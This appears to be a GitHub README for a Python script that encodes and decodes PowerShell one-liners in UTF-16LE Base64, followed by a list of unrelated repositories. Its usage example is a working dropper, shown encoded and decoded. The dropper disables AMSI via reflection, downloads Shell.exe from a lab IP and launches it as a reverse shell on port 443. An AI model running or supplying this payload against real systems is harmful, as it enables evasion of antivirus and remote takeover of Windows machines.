PowerShell Encoder

A very simple python script to encode and decode PowerShell one-liners.

I used Raikia's PowerShell encoder ALOT, but one day it went down, and I was sad! So I created this simple script that I could run on Linux.

For anybody that doesn't know PowerShell doesn't just use Base64, it uses UTF16-LE Base64.

Usage

Show the help:

./ps-encoder.py                                  
Usage: ./ps-encoder.py [OPTION]... [FILE]
PowerShell Base64 encode or decode FILE, or standard input, to standard output.

With no FILE provided as the second argument, the second argument will be encoded or decoded

  -d, --decode      decode the powershell FILE or argument.
  -e, --encode      encode the powershell FILE or argument.
  -h, --help        display this help and exit.

 If you want to ouput to a file use the stdout > operator.

Examples

Encode

Encode a PowerShell dropper file:

./ps-encoder.py -e dropper.txt                    
powershell.exe -exec bypass -enc JABhACAAPQAgAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAcwAoACkAOwBGAG8AcgBFAGEAYwBoACgAJABiACAAaQBuACAAJABhACkAIAB7AGkAZgAgACgAJABiAC4ATgBhAG0AZQAgAC0AbABpAGsAZQAgACIAKgBpAHUAdABpAGwAcwAiACkAIAB7ACQAYwAgAD0AIAAkAGIAfQB9ADsAJABkACAAPQAgACQAYwAuAEcAZQB0AEYAaQBlAGwAZABzACgAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQA7AEYAbwByAEUAYQBjAGgAKAAkAGUAIABpAG4AIAAkAGQAKQAgAHsAaQBmACAAKAAkAGUALgBOAGEAbQBlACAALQBsAGkAawBlACAAIgAqAGkAdABGAGEAaQBsAGUAZAAiACkAIAB7ACQAZgAgAD0AIAAkAGUAfQB9ADsAJABmAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAGYAaQBsAGUAKAAiAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AOQAzAC8AUwBoAGUAbABsAC4AZQB4AGUAIgAsACAAIgBDADoAXAB3AGkAbgBkAG8AdwBzAFwAdABhAHMAawBzAFwAUwBoAGUAbABsAC4AZQB4AGUAIgApADsACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGEAcwBrAHMAXABTAGgAZQBsAGwALgBlAHgAZQAiACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIAMQAwAC4AMQAwAC4AMQA0AC4AOQAzACAANAA0ADMAIgA7AAoA

To file:

./ps-encoder.py -e dropper.txt > encoded-dropper.txt

Decode

Decode a PowerShell dropper:

./ps-encoder.py -d JABhACAAPQAgAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAcwAoACkAOwBGAG8AcgBFAGEAYwBoACgAJABiACAAaQBuACAAJABhACkAIAB7AGkAZgAgACgAJABiAC4ATgBhAG0AZQAgAC0AbABpAGsAZQAgACIAKgBpAHUAdABpAGwAcwAiACkAIAB7ACQAYwAgAD0AIAAkAGIAfQB9ADsAJABkACAAPQAgACQAYwAuAEcAZQB0AEYAaQBlAGwAZABzACgAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQA7AEYAbwByAEUAYQBjAGgAKAAkAGUAIABpAG4AIAAkAGQAKQAgAHsAaQBmACAAKAAkAGUALgBOAGEAbQBlACAALQBsAGkAawBlACAAIgAqAGkAdABGAGEAaQBsAGUAZAAiACkAIAB7ACQAZgAgAD0AIAAkAGUAfQB9ADsAJABmAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAGYAaQBsAGUAKAAiAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AOQAzAC8AUwBoAGUAbABsAC4AZQB4AGUAIgAsACAAIgBDADoAXAB3AGkAbgBkAG8AdwBzAFwAdABhAHMAawBzAFwAUwBoAGUAbABsAC4AZQB4AGUAIgApADsACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGEAcwBrAHMAXABTAGgAZQBsAGwALgBlAHgAZQAiACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIAMQAwAC4AMQAwAC4AMQA0AC4AOQAzACAANAA0ADMAIgA7AAoA
$a = [Ref].Assembly.GetTypes();ForEach($b in $a) {if ($b.Name -like "*iutils") {$c = $b}};$d = $c.GetFields('NonPublic,Static');ForEach($e in $d) {if ($e.Name -like "*itFailed") {$f = $e}};$f.SetValue($null,$true);
(new-object system.net.webclient).downloadfile("http://10.10.14.93/Shell.exe", "C:\windows\tasks\Shell.exe");
Start-Process -FilePath "C:\Windows\Tasks\Shell.exe" -ArgumentList "10.10.14.93 443";

To file:

./ps-encoder.py -d encoded-dropper.txt > dropper.txt

A very simple python script to encode and decode PowerShell one-liners.

Related tags

Overview

PowerShell Encoder

Usage

Examples

Encode

Decode

Owner

John Tear

This is a repository for collecting global custom management extensions for the Django Framework.

Logic-Sim - A clone of 'Digital Logic Sim' from Sebastian Lague

This is a CLI utility that allows you to view RedFlagDeals.com on the command line.

Wordle for CLUE - WORDLE clone for Adafruit Clue

A simple command for converting and processing data from your clipboard.

A python library for parsing multiple types of config files, envvars & command line arguments that takes the headache out of setting app configurations.

A clone of the popular online game Wordle

telescope.nvim is a highly extendable fuzzy finder over lists.

Bear-Shell is a shell based in the terminal or command prompt.

A Multipurpose bot with many Commands made using Pycord

Play WORDLE game in your terminal.

A begginer reverse shell tool python.

A terminal utility to sort image files based on their characteristics.

Message commands extension for discord-py-interactions

The Prisma Cloud CLI is a command line interface for Prisma Cloud by Palo Alto Networks.

Analyzing the most strategic words to guess on Wordle, based on letter frequency distributions

Command-line script to upload videos to Youtube using theYoutube APIv3.

CLI Web-CAT interface for people who use VIM.

Vsm - A manager for the under-utilized mksession command in vim

Stream comments, submissions from subreddits and users across reddit right in your terminal